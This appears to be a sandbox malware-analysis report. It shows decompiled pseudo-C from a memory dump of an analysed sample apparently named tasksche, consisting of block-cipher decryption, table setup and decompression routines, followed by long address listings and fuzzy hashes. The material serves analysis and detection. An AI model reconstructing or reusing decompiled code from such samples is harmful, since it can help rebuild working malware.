                                                                                              										_t152 =  *(_t186 + 4) + _t174;
                                                                                              										 *(_t186 + 4) = _t152 & 0x00000007;
                                                                                              										_t136 = _t152 >> 3;
                                                                                              										 *_t186 =  *_t186 + (_t152 >> 3);
                                                                                              										_t154 = 0x10;
                                                                                              										_t97 = (_t94 -  *((intOrPtr*)(_t182 + _t174 * 4)) >> _t154 - _t174) +  *((intOrPtr*)(_t182 + 0x44 + _t174 * 4));
                                                                                              										__eflags = _t97 -  *_t182;
                                                                                              										if(_t97 >=  *_t182) {
                                                                                              											_t97 = 0;
                                                                                              											__eflags = 0;
                                                                                              										}
                                                                                              										_t98 =  *(_t182 + 0xc88 + _t97 * 2) & 0x0000ffff;
                                                                                              										L31:
                                                                                              										__eflags = _t98 - 0x10;
                                                                                              										if(_t98 >= 0x10) {
                                                                                              											__eflags = _t98 - 0x12;
                                                                                              											_t156 = _t186;
                                                                                              											if(__eflags >= 0) {
                                                                                              												if(__eflags != 0) {
                                                                                              													_t136 = (E004097D1(_t156) >> 9) + 0xb;
                                                                                              													__eflags = _t136;
                                                                                              													_push(7);
                                                                                              												} else {
                                                                                              													_t136 = (E004097D1(_t156) >> 0xd) + 3;
                                                                                              													_push(3);
                                                                                              												}
                                                                                              												E004097BA(_t186);
                                                                                              												while(1) {
                                                                                              													__eflags = _t136;
                                                                                              													if(_t136 <= 0) {
                                                                                              														goto L50;
                                                                                              													}
                                                                                              													_t136 = _t136 - 1;
                                                                                              													__eflags = _a8 - 0x1ae;
                                                                                              													if(_a8 >= 0x1ae) {
                                                                                              														goto L51;
                                                                                              													}
                                                                                              													_t71 =  &_a8;
                                                                                              													 *_t71 = _a8 + 1;
                                                                                              													__eflags =  *_t71;
                                                                                              													 *(_t190 + _a8 - 0x1c8) = 0;
                                                                                              												}
                                                                                              												goto L50;
                                                                                              											}
                                                                                              											__eflags = _t98 - 0x10;
                                                                                              											if(_t98 != 0x10) {
                                                                                              												_t136 = (E004097D1(_t156) >> 9) + 0xb;
                                                                                              												__eflags = _t136;
                                                                                              												_push(7);
                                                                                              											} else {
                                                                                              												_t136 = (E004097D1(_t156) >> 0xd) + 3;
                                                                                              												_push(3);
                                                                                              											}
                                                                                              											E004097BA(_t186);
                                                                                              											_t120 = _a8;
                                                                                              											__eflags = _t120;
                                                                                              											if(_t120 > 0) {
                                                                                              												while(1) {
                                                                                              													__eflags = _t136;
                                                                                              													if(_t136 <= 0) {
                                                                                              														break;
                                                                                              													}
                                                                                              													_t136 = _t136 - 1;
                                                                                              													__eflags = _t120 - 0x1ae;
                                                                                              													if(_t120 >= 0x1ae) {
                                                                                              														goto L51;
                                                                                              													}
                                                                                              													 *((char*)(_t190 + _t120 - 0x1c8)) =  *((intOrPtr*)(_t190 + _t120 - 0x1c9));
                                                                                              													_t120 = _t120 + 1;
                                                                                              													__eflags = _t120;
                                                                                              													_a8 = _t120;
                                                                                              												}
                                                                                              											}
                                                                                              											goto L50;
                                                                                              										}
                                                                                              										_a8 = _a8 + 1;
                                                                                              										 *(_t190 + _a8 - 0x1c8) = _t98;
                                                                                              										goto L50;
                                                                                              									}
                                                                                              									_t166 = _t182 + 4 + _t134 * 4;
                                                                                              									while(1) {
                                                                                              										__eflags = _t94 -  *_t166;
                                                                                              										if(_t94 <  *_t166) {
                                                                                              											break;
                                                                                              										}
                                                                                              										_t134 = _t134 + 1;
                                                                                              										_t166 = _t166 + 4;
                                                                                              										__eflags = _t134 - 0xf;
                                                                                              										if(_t134 < 0xf) {
                                                                                              											continue;
                                                                                              										}
                                                                                              										goto L28;
                                                                                              									}
                                                                                              									_t174 = _t134;
                                                                                              									goto L28;
                                                                                              								}
                                                                                              								_t167 = 0x10;
                                                                                              								_t122 = _t94 >> _t167 - _t133;
                                                                                              								_t170 = ( *(_t122 + _t182 + 0x88) & 0x000000ff) +  *(_t186 + 4);
                                                                                              								 *_t186 =  *_t186 + (_t170 >> 3);
                                                                                              								 *(_t186 + 4) = _t170 & 0x00000007;
                                                                                              								_t98 =  *(_t182 + 0x488 + _t122 * 2) & 0x0000ffff;
                                                                                              								goto L31;
                                                                                              							}
                                                                                              							_t162 = _v8;
                                                                                              							__eflags =  *_t186 -  *((intOrPtr*)(_t162 + 0x78)) - 5;
                                                                                              							if( *_t186 <=  *((intOrPtr*)(_t162 + 0x78)) - 5) {
                                                                                              								goto L20;
                                                                                              							}
                                                                                              							_t116 = E004123EB(_t136, _t162);
                                                                                              							__eflags = _t116;
                                                                                              							if(_t116 == 0) {
                                                                                              								L53:
                                                                                              								_t111 = 0;
                                                                                              								L55:
                                                                                              								L56:
                                                                                              								return _t111;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              							L50:
                                                                                              							__eflags = _a8 - 0x1ae;
                                                                                              						} while (_a8 < 0x1ae);
                                                                                              						L51:
                                                                                              						__eflags =  *((char*)(_t186 + 8));
                                                                                              						_t183 = _v8;
                                                                                              						if(__eflags != 0) {
                                                                                              							L54:
                                                                                              							_t187 = _a12;
                                                                                              							E0041284B(__eflags,  &_v460, _t187, 0x132);
                                                                                              							E0041284B(__eflags,  &_v154, _t187 + 0xeec, 0x40);
                                                                                              							E0041284B(__eflags,  &_v90, _t187 + 0x1dd8, 0x10);
                                                                                              							__eflags = _t187 + 0x2cc4;
                                                                                              							E0041284B(_t187 + 0x2cc4,  &_v74, _t187 + 0x2cc4, 0x2c);
                                                                                              							_t111 = 1;
                                                                                              							goto L55;
                                                                                              						}
                                                                                              						__eflags =  *_t186 -  *((intOrPtr*)(_t183 + 0x78));
                                                                                              						if(__eflags <= 0) {
                                                                                              							goto L54;
                                                                                              						}
                                                                                              						goto L53;
                                                                                              					}
                                                                                              					__eflags =  *_t186 -  *((intOrPtr*)(__ecx + 0x78)) - 0x19;
                                                                                              					if( *_t186 <=  *((intOrPtr*)(__ecx + 0x78)) - 0x19) {
                                                                                              						goto L5;
                                                                                              					}
                                                                                              					_t111 = E004123EB(__ebx, __ecx);
                                                                                              					__eflags = _t111;
                                                                                              					if(_t111 == 0) {
                                                                                              						goto L56;
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				}
                                                                                              				return 1;
                                                                                              			}




































                                                                                              0x0041462b
                                                                                              0x0041463b
                                                                                              0x0041463e
                                                                                              0x00414648
                                                                                              0x0041464b
                                                                                              0x0041464f
                                                                                              0x00414668
                                                                                              0x00414668
                                                                                              0x00414668
                                                                                              0x00414668
                                                                                              0x0041466c
                                                                                              0x0041466e
                                                                                              0x0041467c
                                                                                              0x0041467f
                                                                                              0x00414684
                                                                                              0x00414687
                                                                                              0x004146ce
                                                                                              0x00000000
                                                                                              0x004146ce
                                                                                              0x00414697
                                                                                              0x0041469a
                                                                                              0x0041469f
                                                                                              0x004146a1
                                                                                              0x004146ad
                                                                                              0x004146c2
                                                                                              0x004146c2
                                                                                              0x004146c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004146b0
                                                                                              0x004146b1
                                                                                              0x004146b5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004146ba
                                                                                              0x004146ba
                                                                                              0x004146ba
                                                                                              0x004146bd
                                                                                              0x004146bd
                                                                                              0x004146c6
                                                                                              0x00000000
                                                                                              0x004146c6
                                                                                              0x004146a6
                                                                                              0x004146d2
                                                                                              0x004146d2
                                                                                              0x004146d5
                                                                                              0x004146d5
                                                                                              0x004146e3
                                                                                              0x004146ee
                                                                                              0x004146f3
                                                                                              0x004146f3
                                                                                              0x004146f3
                                                                                              0x004146f7
                                                                                              0x004146f7
                                                                                              0x004146fb
                                                                                              0x00414717
                                                                                              0x00414719
                                                                                              0x0041471e
                                                                                              0x00414724
                                                                                              0x00414729
                                                                                              0x0041472d
                                                                                              0x0041475a
                                                                                              0x0041475b
                                                                                              0x0041475c
                                                                                              0x0041475e
                                                                                              0x00414775
                                                                                              0x00414778
                                                                                              0x0041477f
                                                                                              0x00414782
                                                                                              0x00414785
                                                                                              0x0041478c
                                                                                              0x00414791
                                                                                              0x00414795
                                                                                              0x00414797
                                                                                              0x00414799
                                                                                              0x00414799
                                                                                              0x00414799
                                                                                              0x0041479b
                                                                                              0x004147a3
                                                                                              0x004147a3
                                                                                              0x004147a6
                                                                                              0x004147ba
                                                                                              0x004147bd
                                                                                              0x004147bf
                                                                                              0x00414816
                                                                                              0x00414833
                                                                                              0x00414833
                                                                                              0x00414836
                                                                                              0x00414818
                                                                                              0x00414822
                                                                                              0x00414825
                                                                                              0x00414825
                                                                                              0x0041483a
                                                                                              0x00414859
                                                                                              0x00414859
                                                                                              0x0041485b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414841
                                                                                              0x00414842
                                                                                              0x00414849
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041484e
                                                                                              0x0041484e
                                                                                              0x0041484e
                                                                                              0x00414851
                                                                                              0x00414851
                                                                                              0x00000000
                                                                                              0x00414859
                                                                                              0x004147c1
                                                                                              0x004147c4
                                                                                              0x004147e1
                                                                                              0x004147e1
                                                                                              0x004147e4
                                                                                              0x004147c6
                                                                                              0x004147d0
                                                                                              0x004147d3
                                                                                              0x004147d3
                                                                                              0x004147e8
                                                                                              0x004147ed
                                                                                              0x004147f0
                                                                                              0x004147f2
                                                                                              0x00414810
                                                                                              0x00414810
                                                                                              0x00414812
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004147f6
                                                                                              0x004147f7
                                                                                              0x004147fc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414805
                                                                                              0x0041480c
                                                                                              0x0041480c
                                                                                              0x0041480d
                                                                                              0x0041480d
                                                                                              0x00414814
                                                                                              0x00000000
                                                                                              0x004147f2
                                                                                              0x004147ab
                                                                                              0x004147ae
                                                                                              0x00000000
                                                                                              0x004147ae
                                                                                              0x00414760
                                                                                              0x00414764
                                                                                              0x00414764
                                                                                              0x00414766
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414768
                                                                                              0x00414769
                                                                                              0x0041476c
                                                                                              0x0041476f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414771
                                                                                              0x00414773
                                                                                              0x00000000
                                                                                              0x00414773
                                                                                              0x00414731
                                                                                              0x00414734
                                                                                              0x0041473e
                                                                                              0x00414746
                                                                                              0x0041474b
                                                                                              0x0041474e
                                                                                              0x00000000
                                                                                              0x0041474e
                                                                                              0x004146fd
                                                                                              0x00414706
                                                                                              0x00414708
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041470a
                                                                                              0x0041470f
                                                                                              0x00414711
                                                                                              0x0041487a
                                                                                              0x0041487a
                                                                                              0x004148d6
                                                                                              0x004148d8
                                                                                              0x00000000
                                                                                              0x004148d8
                                                                                              0x00000000
                                                                                              0x0041485d
                                                                                              0x0041485d
                                                                                              0x0041485d
                                                                                              0x0041486a
                                                                                              0x0041486a
                                                                                              0x0041486e
                                                                                              0x00414871
                                                                                              0x0041487e
                                                                                              0x0041487e
                                                                                              0x00414890
                                                                                              0x004148a7
                                                                                              0x004148bb
                                                                                              0x004148c2
                                                                                              0x004148cf
                                                                                              0x004148d4
                                                                                              0x00000000
                                                                                              0x004148d4
                                                                                              0x00414875
                                                                                              0x00414878
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414878
                                                                                              0x00414657
                                                                                              0x00414659
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0041465b
                                                                                              0x00414660
                                                                                              0x00414662
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00414662
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74c5e34f9abefec6387e3142de93532e06a17bc948433487153fd85e66a9dea7
                                                                                              • Instruction ID: 3d3811311c0e96151038b15cdb33c9c3baef1538c920ea216c41a1bce0e780a6
                                                                                              • Opcode Fuzzy Hash: 74c5e34f9abefec6387e3142de93532e06a17bc948433487153fd85e66a9dea7
                                                                                              • Instruction Fuzzy Hash: DC812731600644ABDB14EF29C590BFD73A5EB92318F20842FE9569B2C2C77CD9C2CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E0040CB23(void* __ebx, char* __ecx, char _a4, unsigned int _a8, signed int* _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v9;
                                                                                              				signed int _v10;
                                                                                              				signed int _v11;
                                                                                              				signed int _v12;
                                                                                              				signed int _v13;
                                                                                              				signed int _v14;
                                                                                              				signed int _v15;
                                                                                              				signed int _v16;
                                                                                              				signed int _v17;
                                                                                              				signed int _v18;
                                                                                              				signed int _v19;
                                                                                              				signed int _v20;
                                                                                              				signed int _v21;
                                                                                              				signed int _v22;
                                                                                              				signed int _v23;
                                                                                              				signed int _v24;
                                                                                              				char _v25;
                                                                                              				char _v26;
                                                                                              				char _v27;
                                                                                              				signed int _v28;
                                                                                              				char _v29;
                                                                                              				char _v30;
                                                                                              				char _v31;
                                                                                              				signed int _v32;
                                                                                              				char _v33;
                                                                                              				char _v34;
                                                                                              				char _v35;
                                                                                              				signed int _v36;
                                                                                              				char _v37;
                                                                                              				char _v38;
                                                                                              				char _v39;
                                                                                              				signed int _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				char _v56;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				unsigned int _t204;
                                                                                              				signed int _t236;
                                                                                              				void* _t311;
                                                                                              				signed int* _t312;
                                                                                              				unsigned int _t342;
                                                                                              				intOrPtr* _t344;
                                                                                              				char* _t346;
                                                                                              
                                                                                              				_t311 = __ebx;
                                                                                              				_t204 = _a8;
                                                                                              				_t346 = __ecx;
                                                                                              				if(_t204 > 0) {
                                                                                              					_t342 = _t204 >> 4;
                                                                                              					if( *__ecx == 0) {
                                                                                              						_v8 = __ecx + 8;
                                                                                              						E0041C290(__ebx, _t342, __ecx,  &_v56, __ecx + 8, 0x10);
                                                                                              						_a8 = _t342;
                                                                                              						if(_t342 > 0) {
                                                                                              							_t344 = _a4;
                                                                                              							_push(_t311);
                                                                                              							_t312 = _a12;
                                                                                              							do {
                                                                                              								E0040C43B( &_v24, _t344, ( *(_t346 + 4) << 4) + _t346 + 0x18);
                                                                                              								_v40 =  *(0x4371e0 + (_v24 & 0x000000ff) * 4) ^  *(0x436de0 + (_v11 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v14 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v17 & 0x000000ff) * 4);
                                                                                              								_v36 =  *(0x4371e0 + (_v20 & 0x000000ff) * 4) ^  *(0x436de0 + (_v23 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v10 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v13 & 0x000000ff) * 4);
                                                                                              								_v32 =  *(0x4371e0 + (_v16 & 0x000000ff) * 4) ^  *(0x436de0 + (_v19 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v22 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v9 & 0x000000ff) * 4);
                                                                                              								_v28 =  *(0x4371e0 + (_v12 & 0x000000ff) * 4) ^  *(0x436de0 + (_v15 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v18 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v21 & 0x000000ff) * 4);
                                                                                              								_t236 =  *(_t346 + 4) - 1;
                                                                                              								if(_t236 > 1) {
                                                                                              									_a12 = (_t236 << 4) + _t346 + 0x18;
                                                                                              									_a4 = _t236 - 1;
                                                                                              									do {
                                                                                              										E0040C43B( &_v24,  &_v40, _a12);
                                                                                              										_v40 =  *(0x4371e0 + (_v24 & 0x000000ff) * 4) ^  *(0x436de0 + (_v11 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v14 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v17 & 0x000000ff) * 4);
                                                                                              										_v36 =  *(0x4371e0 + (_v20 & 0x000000ff) * 4) ^  *(0x436de0 + (_v23 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v10 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v13 & 0x000000ff) * 4);
                                                                                              										_a12 = _a12 - 0x10;
                                                                                              										_v32 =  *(0x4371e0 + (_v16 & 0x000000ff) * 4) ^  *(0x436de0 + (_v19 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v22 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v9 & 0x000000ff) * 4);
                                                                                              										_t127 =  &_a4;
                                                                                              										 *_t127 = _a4 - 1;
                                                                                              										_v28 =  *(0x4371e0 + (_v12 & 0x000000ff) * 4) ^  *(0x436de0 + (_v15 & 0x000000ff) * 4) ^  *(0x4369e0 + (_v18 & 0x000000ff) * 4) ^  *(0x4365e0 + (_v21 & 0x000000ff) * 4);
                                                                                              									} while ( *_t127 != 0);
                                                                                              								}
                                                                                              								E0040C43B( &_v24,  &_v40, _t346 + 0x28);
                                                                                              								_v40 =  *((intOrPtr*)((_v24 & 0x000000ff) + 0x438600));
                                                                                              								_v39 =  *((intOrPtr*)((_v11 & 0x000000ff) + 0x438600));
                                                                                              								_v38 =  *((intOrPtr*)((_v14 & 0x000000ff) + 0x438600));
                                                                                              								_v37 =  *((intOrPtr*)((_v17 & 0x000000ff) + 0x438600));
                                                                                              								_t146 = (_v20 & 0x000000ff) + 0x438600; // 0x8239e37c
                                                                                              								_v36 =  *_t146;
                                                                                              								_v35 =  *((intOrPtr*)((_v23 & 0x000000ff) + 0x438600));
                                                                                              								_v34 =  *((intOrPtr*)((_v10 & 0x000000ff) + 0x438600));
                                                                                              								_v33 =  *((intOrPtr*)((_v13 & 0x000000ff) + 0x438600));
                                                                                              								_t158 = (_v16 & 0x000000ff) + 0x438600; // 0xa340bf38
                                                                                              								_v32 =  *_t158;
                                                                                              								_v31 =  *((intOrPtr*)((_v19 & 0x000000ff) + 0x438600));
                                                                                              								_v30 =  *((intOrPtr*)((_v22 & 0x000000ff) + 0x438600));
                                                                                              								_v29 =  *((intOrPtr*)((_v9 & 0x000000ff) + 0x438600));
                                                                                              								_t170 = (_v12 & 0x000000ff) + 0x438600; // 0xd56a0952
                                                                                              								_v28 =  *_t170;
                                                                                              								_v27 =  *((intOrPtr*)((_v15 & 0x000000ff) + 0x438600));
                                                                                              								_v26 =  *((intOrPtr*)((_v18 & 0x000000ff) + 0x438600));
                                                                                              								_v25 =  *((intOrPtr*)((_v21 & 0x000000ff) + 0x438600));
                                                                                              								E0040C43B( &_v40,  &_v40, _t346 + 0x18);
                                                                                              								if( *((char*)(_t346 + 1)) != 0) {
                                                                                              									E0040C43B( &_v40,  &_v40,  &_v56);
                                                                                              								}
                                                                                              								_v56 =  *_t344;
                                                                                              								_v52 =  *((intOrPtr*)(_t344 + 4));
                                                                                              								_v48 =  *((intOrPtr*)(_t344 + 8));
                                                                                              								_v44 =  *((intOrPtr*)(_t344 + 0xc));
                                                                                              								 *_t312 = _v40;
                                                                                              								_t312[1] = _v36;
                                                                                              								_t312[2] = _v32;
                                                                                              								_t312[3] = _v28;
                                                                                              								_t344 = _t344 + 0x10;
                                                                                              								_t312 =  &(_t312[4]);
                                                                                              								_t200 =  &_a8;
                                                                                              								 *_t200 = _a8 - 1;
                                                                                              							} while ( *_t200 != 0);
                                                                                              							_pop(_t311);
                                                                                              						}
                                                                                              						_t204 = E0041C290(_t311, _t342, _t346, _v8,  &_v56, 0x10);
                                                                                              					} else {
                                                                                              						_t204 = E0040C46D(__ecx, _a4, _t342, _a12);
                                                                                              					}
                                                                                              				}
                                                                                              				return _t204;
                                                                                              			}

















































                                                                                              0x0040cb23
                                                                                              0x0040cb26
                                                                                              0x0040cb2d
                                                                                              0x0040cb31
                                                                                              0x0040cb3e
                                                                                              0x0040cb40
                                                                                              0x0040cb59
                                                                                              0x0040cb60
                                                                                              0x0040cb68
                                                                                              0x0040cb6d
                                                                                              0x0040cb73
                                                                                              0x0040cb76
                                                                                              0x0040cb77
                                                                                              0x0040cb7a
                                                                                              0x0040cb8a
                                                                                              0x0040cbbf
                                                                                              0x0040cbee
                                                                                              0x0040cc1d
                                                                                              0x0040cc48
                                                                                              0x0040cc4e
                                                                                              0x0040cc52
                                                                                              0x0040cc62
                                                                                              0x0040cc65
                                                                                              0x0040cc68
                                                                                              0x0040cc73
                                                                                              0x0040cca8
                                                                                              0x0040ccd7
                                                                                              0x0040cd06
                                                                                              0x0040cd0a
                                                                                              0x0040cd35
                                                                                              0x0040cd35
                                                                                              0x0040cd38
                                                                                              0x0040cd38
                                                                                              0x0040cc68
                                                                                              0x0040cd4d
                                                                                              0x0040cd5c
                                                                                              0x0040cd69
                                                                                              0x0040cd76
                                                                                              0x0040cd83
                                                                                              0x0040cd8a
                                                                                              0x0040cd90
                                                                                              0x0040cd9d
                                                                                              0x0040cdaa
                                                                                              0x0040cdb7
                                                                                              0x0040cdbe
                                                                                              0x0040cdc4
                                                                                              0x0040cdd1
                                                                                              0x0040cdde
                                                                                              0x0040cdeb
                                                                                              0x0040cdf2
                                                                                              0x0040cdf8
                                                                                              0x0040ce05
                                                                                              0x0040ce12
                                                                                              0x0040ce1f
                                                                                              0x0040ce2b
                                                                                              0x0040ce34
                                                                                              0x0040ce3f
                                                                                              0x0040ce3f
                                                                                              0x0040ce46
                                                                                              0x0040ce4c
                                                                                              0x0040ce52
                                                                                              0x0040ce58
                                                                                              0x0040ce5e
                                                                                              0x0040ce63
                                                                                              0x0040ce69
                                                                                              0x0040ce6f
                                                                                              0x0040ce72
                                                                                              0x0040ce75
                                                                                              0x0040ce78
                                                                                              0x0040ce78
                                                                                              0x0040ce78
                                                                                              0x0040ce81
                                                                                              0x0040ce81
                                                                                              0x0040ce8b
                                                                                              0x0040cb42
                                                                                              0x0040cb49
                                                                                              0x0040cb49
                                                                                              0x0040ce93
                                                                                              0x0040ce96

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10288e97197f0ad943ca35c4742294250ec2590f5ea2a5543df369fbf88b7a0a
                                                                                              • Instruction ID: 755fc568a246bd0a3aab6df15388740ae6706893d1001b075bd9344283f82762
                                                                                              • Opcode Fuzzy Hash: 10288e97197f0ad943ca35c4742294250ec2590f5ea2a5543df369fbf88b7a0a
                                                                                              • Instruction Fuzzy Hash: FFC151B48182D9AECF01DFA5D4A09FEBFF4AF1A240B0950DAE5D5A7252C234D720DB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E0040C756() {
                                                                                              				signed char _v8;
                                                                                              				char _v521;
                                                                                              				signed int _t98;
                                                                                              				signed int _t100;
                                                                                              				signed int _t102;
                                                                                              				signed char _t105;
                                                                                              				signed char _t106;
                                                                                              				char _t107;
                                                                                              				void* _t108;
                                                                                              				signed char _t119;
                                                                                              				signed int _t120;
                                                                                              				signed int _t129;
                                                                                              				signed char* _t155;
                                                                                              				signed int _t156;
                                                                                              				signed int _t161;
                                                                                              				signed int _t162;
                                                                                              				signed int _t163;
                                                                                              				signed int _t164;
                                                                                              				signed int _t181;
                                                                                              				signed int _t182;
                                                                                              				void* _t183;
                                                                                              
                                                                                              				_t107 = 0;
                                                                                              				_t98 = 1;
                                                                                              				do {
                                                                                              					 *(_t183 + _t107 - 0x304) = _t98;
                                                                                              					 *(_t183 + _t107 - 0x205) = _t98;
                                                                                              					 *((char*)(_t183 + _t98 - 0x104)) = _t107;
                                                                                              					_t107 = _t107 + 1;
                                                                                              					asm("sbb edx, edx");
                                                                                              					_t98 = _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b ^ _t98 + _t98;
                                                                                              				} while (_t98 != 1);
                                                                                              				_t108 = 0;
                                                                                              				do {
                                                                                              					asm("sbb edx, edx");
                                                                                              					 *(_t108 + 0x4385e0) = _t98;
                                                                                              					_t98 = _t98 + _t98 ^  ~(_t98 & 0x00000080) & 0x0000011b;
                                                                                              					_t108 = _t108 + 1;
                                                                                              				} while (_t108 < 0x1e);
                                                                                              				_t105 = 0;
                                                                                              				_v8 = 0;
                                                                                              				L6:
                                                                                              				L6:
                                                                                              				if(_t105 == 0) {
                                                                                              					_t100 = 0;
                                                                                              				} else {
                                                                                              					_t100 =  *( &_v521 - ( *(_t183 + (_t105 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
                                                                                              				}
                                                                                              				_t119 = (_t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100)) >> 0x00000008 ^ _t100 ^ (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) + (((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) + ((_t100 + _t100 ^ _t100) + (_t100 + _t100 ^ _t100) ^ _t100) ^ _t100) ^ 0x00000063;
                                                                                              				_t102 = _t105 * 4;
                                                                                              				_t16 = _t102 + 0x4375e0; // 0x4375e0
                                                                                              				_t155 = _t16;
                                                                                              				 *(_t105 + 0x438700) = _t119;
                                                                                              				_t155[1] = _t119;
                                                                                              				 *_t155 = _t119;
                                                                                              				 *(_t102 + 0x4379e3) = _t119;
                                                                                              				 *(_t102 + 0x4379e0) = _t119;
                                                                                              				 *(_t102 + 0x437de3) = _t119;
                                                                                              				 *(_t102 + 0x437de2) = _t119;
                                                                                              				 *(_t102 + 0x4381e2) = _t119;
                                                                                              				 *(_t102 + 0x4381e1) = _t119;
                                                                                              				if(_t119 == 0) {
                                                                                              					_t156 = 0;
                                                                                              				} else {
                                                                                              					_t156 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
                                                                                              				}
                                                                                              				 *(_t102 + 0x4375e3) = _t156;
                                                                                              				 *(_t102 + 0x4379e2) = _t156;
                                                                                              				 *(_t102 + 0x437de1) = _t156;
                                                                                              				 *(_t102 + 0x4381e0) = _t156;
                                                                                              				if(_t119 == 0) {
                                                                                              					_t120 = 0;
                                                                                              				} else {
                                                                                              					_t120 =  *(_t183 + ( *(_t183 + (_t119 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
                                                                                              				}
                                                                                              				 *(_t102 + 0x4375e2) = _t120;
                                                                                              				 *(_t102 + 0x4379e1) = _t120;
                                                                                              				 *(_t102 + 0x437de0) = _t120;
                                                                                              				 *(_t102 + 0x4381e3) = _t120;
                                                                                              				_t181 = _t105 & 0x000000ff;
                                                                                              				if((((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) >> 0x00000008 ^ ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) + ((_t181 << 0x00000003 ^ _t181) << 0x00000002 ^ _t181) ^ 0x00000005) == 0) {
                                                                                              					_t106 = 0;
                                                                                              				} else {
